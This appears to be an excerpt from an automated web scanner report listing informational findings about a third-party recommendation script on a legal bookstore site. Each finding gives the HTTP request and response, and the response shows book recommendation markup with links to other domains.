=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy and Domestic Relations Manual, 2010-2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p40340361-159259S.JPG" alt="Bankruptcy and Domestic Relations Manual, 2010-2011 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159259&MaterialNumber=40340361&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159259" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=62b126ce-e29a-4f38-4315-024be4d0c771&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159259&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
son.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)"><img src="http://images.west.thomson.com/store/product_photos/p11226789-520S.jpg" alt="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=520&MaterialNumber=11226789&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn520" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=62b126ce-e29a-4f38-4315-024be4d0c771&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=520&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
itle="Chapter 7 Consumer Bankruptcy Strategies, 2010 ed.: Leading Lawyers on Preparing a Chapter 7 Filing, Establishing Effective Client Strategies, and Understanding Recent Trends (Inside the Minds)"><img src="http://images.west.thomson.com/store/product_photos/p40888206-174615S.JPG" alt="Chapter 7 Consumer Bankruptcy Strategies, 2010 ed.: Leading Lawyers on Preparing a Chapter 7 Filing, Establishing Effective Client Strategies, and Understanding Recent Trends (Inside the Minds)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=174615&MaterialNumber=40888206&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn174615" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=62b126ce-e29a-4f38-4315-024be4d0c771&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=174615&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F174615%2F40888206%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
oductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)"><img src="http://images.west.thomson.com/store/product_photos/print_icon.gif" alt="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159383&MaterialNumber=40121151&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159383" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=62b126ce-e29a-4f38-4315-024be4d0c771&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159383&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.98. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848457045&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com
Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; vihc=b73.1303848426852.21158348%7C; pvihc=b73.1303848426852.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:07:27 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b73.1303848447284.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848447284.21158348%7C; Expires=Fri, 23-Apr-2021 20:07:27 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19155

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
4%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Procedure Manual: Federal Rules of Bankruptcy Procedure Annotated, 2010 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p15401674-160396S.JPG" alt="Bankruptcy Procedure Manual: Federal Rules of Bankruptcy Procedure Annotated, 2010 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160396&MaterialNumber=15401674&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160396" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6b6c690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=ClickCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160396&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160396%2F15401674%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
g=179&p=175579&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F175579%2F14862747%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Law Manual, 5th, 2010-2 ed."><img src="http://images.west.thomson.com/store/product_photos/p14862747-175579S.JPG" alt="Bankruptcy Law Manual, 5th, 2010-2 ed." style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=175579&MaterialNumber=14862747&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn175579" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6b6c690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=ClickCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=175579&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F175579%2F14862747%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
ugy4lk3a&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Practice Handbook, 2d"><img src="http://images.west.thomson.com/store/product_photos/p13972135-2808S.jpg" alt="Bankruptcy Practice Handbook, 2d" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2808&MaterialNumber=13972135&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2808" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6b6c690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=ClickCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
st.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p12484463-160547S.JPG" alt="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160547&MaterialNumber=12484463&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160547" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6b6c690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160547&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Contract Law (Vol. 49, Texas Practice Series)"><img src="http://images.west.thomson.com/store/product_photos/p40406951-132218S.JPG" alt="Contract Law (Vol. 49, Texas Practice Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=132218&MaterialNumber=40406951&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn132218" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6b6c690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
pg=179&p=160670&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160670%2F40759138%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Texas Trial Objections, 2010-2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p40759138-160670S.JPG" alt="Texas Trial Objections, 2010-2011 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160670&MaterialNumber=40759138&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160670" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6b6c690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160670&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160670%2F40759138%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
9&p=2158&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2158%2F13975614%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Tax Aspects of Bankruptcy Law and Practice, 3d"><img src="http://images.west.thomson.com/store/product_photos/p13975614-2158S.jpg" alt="Tax Aspects of Bankruptcy Law and Practice, 3d" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2158&MaterialNumber=13975614&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2158" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6b6c690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=2158&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2158%2F13975614%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.99. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848435747&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com
Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; vihc=b73.1303848419997.21158348%7C; pvihc=b73.1303848419997.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:07:06 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b73.1303848426852.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848426852.21158348%7C; Expires=Fri, 23-Apr-2021 20:07:06 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19209

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
g=179&p=144774&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F144774%2F13515946%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Norton Bankruptcy Law and Practice, 3d"><img src="http://images.west.thomson.com/store/product_photos/p13515946-144774S.JPG" alt="Norton Bankruptcy Law and Practice, 3d" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=144774&MaterialNumber=13515946&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn144774" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=3752bfd3-edbc-4f13-f9c1-f94be4d2c9a3&pti=1&pa=right&hpi=903&stn=ClickEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=144774&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F144774%2F13515946%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
fugy4lk3a&pg=179&p=2811&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2811%2F13512274%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Service, Lawyers ed."><img src="http://images.west.thomson.com/store/product_photos/13512272.jpg" alt="Bankruptcy Service, Lawyers ed." style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2811&MaterialNumber=13512274&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2811" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=3752bfd3-edbc-4f13-f9c1-f94be4d2c9a3&pti=1&pa=right&hpi=903&stn=ClickEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=2811&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2811%2F13512274%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
ugy4lk3a&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Practice Handbook, 2d"><img src="http://images.west.thomson.com/store/product_photos/p13972135-2808S.jpg" alt="Bankruptcy Practice Handbook, 2d" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2808&MaterialNumber=13972135&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2808" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=3752bfd3-edbc-4f13-f9c1-f94be4d2c9a3&pti=1&pa=right&hpi=903&stn=ClickEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
son.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)"><img src="http://images.west.thomson.com/store/product_photos/p11226789-520S.jpg" alt="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=520&MaterialNumber=11226789&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn520" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=3752bfd3-edbc-4f13-f9c1-f94be4d2c9a3&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=520&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
itle="Chapter 7 Consumer Bankruptcy Strategies, 2010 ed.: Leading Lawyers on Preparing a Chapter 7 Filing, Establishing Effective Client Strategies, and Understanding Recent Trends (Inside the Minds)"><img src="http://images.west.thomson.com/store/product_photos/p40888206-174615S.JPG" alt="Chapter 7 Consumer Bankruptcy Strategies, 2010 ed.: Leading Lawyers on Preparing a Chapter 7 Filing, Establishing Effective Client Strategies, and Understanding Recent Trends (Inside the Minds)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=174615&MaterialNumber=40888206&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn174615" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=3752bfd3-edbc-4f13-f9c1-f94be4d2c9a3&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=174615&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F174615%2F40888206%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
oductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)"><img src="http://images.west.thomson.com/store/product_photos/print_icon.gif" alt="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159383&MaterialNumber=40121151&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159383" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=3752bfd3-edbc-4f13-f9c1-f94be4d2c9a3&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159383&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F146955%2F40711471%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Mortgage and Asset Backed Securities Litigation Handbook"><img src="http://images.west.thomson.com/store/product_photos/p40711471-146955S.JPG" alt="Mortgage and Asset Backed Securities Litigation Handbook" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=146955&MaterialNumber=40711471&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn146955" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=3752bfd3-edbc-4f13-f9c1-f94be4d2c9a3&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=146955&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F146955%2F40711471%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.100. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848435584&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com
Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; vihc=b73.1303848419997.21158348%7C; pvihc=b73.1303848419997.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:07:05 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b73.1303848425808.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848425808.21158348%7C; Expires=Fri, 23-Apr-2021 20:07:05 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19140

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Contract Law (Vol. 49, Texas Practice Series)"><img src="http://images.west.thomson.com/store/product_photos/p40406951-132218S.JPG" alt="Contract Law (Vol. 49, Texas Practice Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
